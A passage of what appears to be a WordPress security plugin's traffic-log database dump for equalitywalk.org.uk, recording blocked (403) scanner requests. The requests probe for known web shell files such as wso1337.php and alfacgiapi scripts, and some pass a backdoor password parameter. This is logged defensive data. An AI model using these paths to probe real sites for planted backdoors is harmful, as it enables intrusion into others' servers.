3.5.30729)\"}','FQXaN0JfUyMnuImovOdjYZ9w',0,1674455300.1965,85,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','dDS0UIhlYLGpVXOT63KHz5xe',0,1674455300.9878,102,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kwW4XOSZshKE0JPoymdbjG3A',0,1674455301.7909,93,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/anone.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7WwL4sHM8ej3vuATJydOiPfZ',0,1674455302.5921,152,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','5LKm3P9lCVTDHg7UpawkyM2N',0,1674455303.4519,144,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-ad.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','DGPTaCJ9L8BMjtqKVs5pN20b',0,1674455304.3165,87,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','MR46uH2b7EVpCqYivoIyUG1W',0,1674455305.1252,124,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/.wp-cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','GlDPd9KFStgbOnBVaXkMUQv0',0,1674455305.9526,95,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/sendmail.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lcWFUafeIy7S5g6CM89JdNEr',0,1674455306.7607,87,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/rahma.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Y7RL6hdeCSBy5Vvw2mxiPZJ9',0,1674455307.5553,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/nasgor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','t19H3GZJpTnYgo2XDOihweW8',0,1674455308.3683,148,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-confirm.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SYqEs705BjVr81DZJbKOMWxA',0,1674455309.2147,91,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alfa123.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QpEPFxvDfUjLhM6SwRz78bYi',0,1674455309.9958,99,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','h9Tez4tWc7wHSXLmQVJP6qMr',0,1674455310.7922,84,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','DTlY6uOWJhv5Z2fqQpKAozt4',0,1674455311.5729,131,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-one.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','cBZ23i0FUkoy7rz9T1YwEGPD',0,1674455312.4469,88,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alexus.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','8KTMx7XWdjQolpGby5kgr3zZ',0,1674455313.2377,102,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wso1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VWDCeGSUnKwl35uXNafmEFO1',0,1674455314.0561,93,'','GET',403,0,700,0,1,'',0),('20.245.185.110',351648110,'','https://www.equalitywalk.org.uk/wp-includes/css/css.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','hDLS3IAkyaUm096czZp1fOiM',0,1674459535.9703,124,'','GET',403,0,700,0,1,'',0),('20.245.185.110',351648110,'','https://www.equalitywalk.org.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','7cp5YEjDes13XqIvCxJutHfb',0,1674459539.9256,100,'','GET',403,0,700,0,1,'',0),('20.245.185.110',351648110,'','https://www.equalitywalk.org.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','5AHdTo02ZKLfq4Cxw1FWzpNS',0,1674459543.2145,96,'','GET',403,0,700,0,1,'',0),('20.245.185.110',351648110,'','https://www.equalitywalk.org.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Szew2KviR76jPVD4c05F3pGM',0,1674459546.1390,94,'','GET',403,0,700,0,1,'',0),('20.245.185.110',351648110,'','https://www.equalitywalk.org.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','7pSd5IWmK1xwTr3XYMFhjf4D',0,1674459559.2749,100,'','GET',403,0,700,0,1,'',0),('20.245.185.110',351648110,'','https://www.equalitywalk.org.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','m2Fq64hp0oTBCL1ljYOaUxVe',0,1674459573.6091,104,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','8WGXFmPCinOt371ckyxrofgs',0,1674462098.9415,102,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','IbHYRopPJ56BTQZdGmEt4rXu',0,1674462099.2412,126,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','v6DHShajPeqUwRXMz5rmo1IY',0,1674462099.5563,85,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','odt9FamSV3sAL6yJeDBUThjb',0,1674462101.7484,136,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','PCYAfgT8RDcbFmqsw5NhadKX',0,1674462102.0765,95,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','f51taX3F2IeQVuq9AUTcSRs6',0,1674462102.3692,94,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','lUTzkHXBY7MRJurNoAI4V6aK',0,1674462104.7926,90,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','9gq12VStjJPQbyB3wE6hAmx4',0,1674462105.0577,114,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','zWO7Er6A8x1vg3dchokqpSIR',0,1674462105.3451,111,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','a2dE7W8hlfFJD9xmqecRAY0z',0,1674462108.4710,120,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','ORxyYpvZWMmTdLNFVjhABb92',0,1674462108.7991,93,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','yJYoLDRuEe6QfKcONgIjrGUZ',0,1674462109.1388,96,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/upload/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','X2D8uBFy7wZ4EjMHIxreoizd',0,1674462111.8330,105,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/upload/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','7ILO8YkwygtUav6A41Ff3hSq',0,1674462112.1266,126,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/upload/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','lQMmASZhn7N05HrLEuxq8og2',0,1674462112.4763,87,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/upload/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','8DpEWsPMbJOrGmQlYq3uTXk9',0,1674462117.4001,131,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/upload/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','0M3Kh2dnLcOtJ8VRufjYPFwX',0,1674462117.7262,120,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/upload/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','qNhyF9M5JnOYtC0XwLGsQBDT',0,1674462118.0550,120,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/uploads/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','ZdxhvXu4B3mQnPlraL5Ee0Kt',0,1674462121.6012,96,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/uploads/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','YMEaJAHCmOptzI0RZ3Bdjwc4',0,1674462121.9491,93,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/uploads/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','2IW5cMSnd3jZlabLHuqvz8BJ',0,1674462122.2729,93,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/uploads/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','rgGij6JCtYF4RVI8DWyTZX7l',0,1674462127.1642,117,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/uploads/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','UQJuqanFgw5Iyv8H6ZWNCjbh',0,1674462128.5540,85,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/uploads/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','j5bk3QSzvwTZA0rifmyNp6KG',0,1674462128.8336,115,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/upload/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Ey5jDA2OR1rQb6cNTw3a7ue4',0,1674462133.8064,92,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/upload/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','thAFjq1ymgw6Hs3xkReWiaXd',0,1674462134.5054,105,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/upload/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','RrwWevM9u8BU2OH1n64fpgPi',0,1674462134.8324,94,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/upload/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','itImyAP7Tsk1MLvjowOlKpux',0,1674462137.2588,110,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/upload/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','j5P1gsbTAO6cQ047mHBRuaEX',0,1674462137.7088,103,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/upload/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','RLF1TIsHiO2q5WmhDPjuGx9X',0,1674462137.9807,94,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/uploads/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','XMb3ntql2VaO7d6rS4sfAmG1',0,1674462141.9029,144,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/uploads/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','WmNRzj0nSb9Ku4Ycy1GktEVf',0,1674462142.2425,147,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/uploads/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','ajP8TW4bKZRvfFyuMrV6zCN9',0,1674462142.5963,102,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/uploads/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','PxOcysUng4bu85W0T26oiJLC',0,1674462147.2384,95,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/uploads/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Ahnv783pXo50EPuDwfLqIegZ',0,1674462147.5777,84,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/assets/uploads/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','4oqIL5ukimBK1ytdHJR3PgF8',0,1674462147.8723,89,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-admin/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','aOZpWdNJeU94TIgwfot0GR57',0,1674462199.7849,94,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-admin/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','pIogsnxVFWhbS024uwHcaM3G',0,1674462200.1003,107,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-admin/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','nelG95gkUXjSONKwcCxbHpiI',0,1674462200.4791,92,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-admin/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','0ULnGPzsuSXBcQqdANVvOo1J',0,1674462203.6321,110,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-admin/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','LP14gyJbsk2zSAGchUZMvwOW',0,1674462203.9676,139,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-admin/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) 